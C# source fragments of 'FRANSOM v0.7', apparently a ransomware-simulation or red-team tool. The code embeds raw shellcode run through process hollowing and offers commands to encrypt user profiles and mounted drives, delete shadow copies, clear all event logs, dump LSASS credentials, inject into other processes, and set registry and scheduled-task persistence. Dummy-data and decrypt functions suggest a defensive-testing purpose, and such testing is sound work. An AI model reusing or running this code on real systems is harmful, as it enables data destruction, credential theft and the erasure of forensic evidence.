public void ExecuteProcessHollowing() { byte[] shellcode = new byte[184] { 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5 }; byte[] finalshellcode = new byte[shellcode.Length + target_.Length + 1]; Array.Copy(shellcode, finalshellcode, shellcode.Length); Array.Copy(target_, 0, finalshellcode, shellcode.Length, target_.Length); finalshellcode[shellcode.Length + target_.Length] = 0; ProcessHollowing ldr = new ProcessHollowing(); try { ldr.Load(HollowedProcessX85, finalshellcode); } catch (Exception e) { Console.WriteLine("[x] Something went wrong!" + e.Message); } }
static void InteractiveShell() { string command = ""; string line = ""; int process_id; var d = new DumpLSASS(); var p = new Persistence(); var e = new Enumerate(); var pr = new Program(); var ph = new ProcessHollowing(); Logger.WriteLine(""); Logger.WriteLine(FiggleFonts.Doom.Render("FRANSOM v0.7")); Logger.WriteLine("Copyright (c) 2021 Fraktal Ltd."); Logger.WriteLine(""); while (command != "exit") { Logger.Write("FRANSOM> "); command = Console.ReadLine(); Logger.WriteLine("*** Executing command: '" + command + "' ***"); switch (command) { case "log-on": Logger.LogToFile(true); break; case "log-off": Logger.LogToFile(false); break; case "help": DisplayHelpShell(); break; case "enumerate-user-profile": pr.EnumerateUserProfile(); break; case "encrypt-user-profile": pr.EncryptUserProfile(); break; case "decrypt-user-profile": DecryptUserProfile(); break; case "create-local-dummy-data": LocalDummyDataCreation(); break; case "cleanup-user-profile": CleanupUserProfile(); break; case "enumerate-mounted-drives": pr.DoDriveEnumeration(); break; case "encrypt-mounted-drives": pr.DoDriveEncryption(); break; case "decrypt-mounted-drives": DoDriveDecryption(); break; case "create-mounted-drives-dummy-data": MountedDrivesDummyDataCreation(); break; case "cleanup-mounted-drives": DoDriveCleanup(); break; case "enumerate-shadow-copies": EnumerateShadowCopies(); break; case "delete-shadow-copies": pr.DeleteShadowCopies(); break; case "net-assembly-injection": pr.NetAssemblyInjection(); break; case "kill-office-applications": pr.KillOfficeApplications(); break; case "thread-inject": Logger.Write("Enter process ID: "); line = Console.ReadLine(); if (int.TryParse(line, out process_id)) { pr.DoThreadInjection(process_id); } else { Logger.WriteLine("The value provided is not a valid process id."); } break; case "apc-inject": Logger.Write("Enter process ID: "); line = Console.ReadLine(); if (int.TryParse(line, out process_id)) { DoApcInjection(process_id); } else { Logger.WriteLine("The value provided is not a valid process id."); } break; case "apc-inject-new-process": pr.DoApcInjectionNewProcess(); break; case "remote-thread": Logger.Write("Enter process ID: "); line = Console.ReadLine(); if (int.TryParse(line, out process_id)) { DoRemoteThread(process_id); } else { Logger.WriteLine("The value provided is not a valid process id."); } break; case "process-hollowing": ph.ExecuteProcessHollowing(); break; case "delete-eventlogs": pr.DeleteEventLogs(); break; case "dump-lsass": d.Run(); break; case "userregkey": p.UserRegKey(); break; case "userregkey-clean": p.CleanupUserRegKey(); break; case "scheduled-task": p.CreateScheduledTask(); break; case "scheduled-task-clean": p.RemoveScheduledTask(); break; case "ps": e.EnumerateProcesses(); break; case "domain-users": e.EnumerateDomainUsers(); break; case "domain-groups": e.EnumerateDomainGroups(); break; case "domain-computers": e.EnumerateDomainComputers(); break; case "domain-trusts": e.EnumerateDomainTrusts(); break; case "domain-shares": e.EnumerateDomainShares(); break; case "exit": break; default: Logger.WriteLine("Invalid command - enter \"help\" to list all available options."); break; } } }
static void Run(Options options) { var pr = new Program(); if (options.EnumerateUserProfile) { pr.EnumerateUserProfile(); } else if (options.EncryptUserProfile) { pr.EncryptUserProfile(); } else if (options.DecryptUserProfile) { DecryptUserProfile(); } else if (options.CreateLocalDummyData) { LocalDummyDataCreation(); } else if (options.CreateMountedDrivesDummyData) { MountedDrivesDummyDataCreation(); } else if (options.CleanupUserProfile) { CleanupUserProfile(); } else if (options.EnumerateMountedDrives) { pr.DoDriveEnumeration(); } else if (options.EncryptMountedDrives) { pr.DoDriveEncryption(); } else if (options.DecryptMountedDrives) { DoDriveDecryption(); } else if (options.CleanupMountedDrives) { DoDriveCleanup(); } else if (options.EnumerateShadowCopies) { EnumerateShadowCopies(); } else if (options.DeleteShadowCopies) { pr.DeleteShadowCopies(); } else if (options.NetAssemblyInjection) { pr.NetAssemblyInjection(); } else if (options.KillOfficeApplications) { pr.KillOfficeApplications(); } else if (options.ThreadInject > 0) { pr.DoThreadInjection(options.ThreadInject); } else if (options.APCInject > 0) { DoApcInjection(options.APCInject); } else if (options.APCInjectNewProcess) { pr.DoApcInjectionNewProcess(); } else if (options.RemoteThread > 0) { DoRemoteThread(options.RemoteThread); } if (options.ProcessHollowing) { var ph = new ProcessHollowing(); ph.ExecuteProcessHollowing(); } if (options.DeleteLogs) { foreach (var log in EventLog.GetEventLogs()) { Logger.WriteLine("Deleting " + log.LogDisplayName); log.Clear(); log.Dispose(); } Logger.WriteLine("Done, all event logs gone!"); } if (options.UserRegKey) { var p = new Persistence(); p.UserRegKey(); } if (options.UserRegKeyClear) { var p = new Persistence(); p.CleanupUserRegKey(); } if (options.ScheduledTask) { var p = new Persistence(); p.CreateScheduledTask(); } if (options.ScheduledTaskClean) { var p = new Persistence(); p.RemoveScheduledTask(); } if (options.DumpLsass) { var d = new DumpLSASS(); d.Run(); } if (options.ListProcesses) { var e = new Enumerate(); e.EnumerateProcesses(); } if (options.EnumDomainUsers) { var e = new Enumerate(); e.EnumerateDomainUsers(); } if (options.EnumDomainGroups) { var e = new Enumerate(); e.EnumerateDomainGroups(); } if (options.EnumDomainComputers) { var e = new Enumerate(); e.EnumerateDomainComputers(); } if (options.EnumDomainTrusts) { var e = new Enumerate(); e.EnumerateDomainTrusts(); } if (options.Shell) { InteractiveShell(); } }